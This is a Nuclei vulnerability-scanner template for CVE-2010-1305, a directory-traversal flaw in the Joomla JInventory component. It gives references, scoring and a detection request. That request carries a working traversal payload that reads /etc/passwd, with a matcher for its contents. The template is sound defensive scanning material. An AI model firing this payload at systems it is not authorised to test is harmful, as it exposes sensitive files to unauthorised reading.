nuclei-templates/http/cves/2010/CVE-2010-1305.yaml

45 lines
1.8 KiB
YAML

id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/12065
- https://nvd.nist.gov/vuln/detail/CVE-2010-1305
- http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
- http://www.vupen.com/english/advisories/2010/0811
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57538
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1305
cwe-id: CWE-22
epss-score: 0.03203
epss-percentile: 0.91191
cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomlamo
product: com_jinventory
tags: cve,cve2010,joomla,lfi,edb,joomlamo
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402207ff5ab30f4234618c6cb8ff8937b8c3f026fa22540c30e4723be09fd9a170bd7022018299b594c95012ccccd91e2464086eb0b75f168ba8b37e2befe9afb330da921:922c64590222798bb761d5b6d8e72950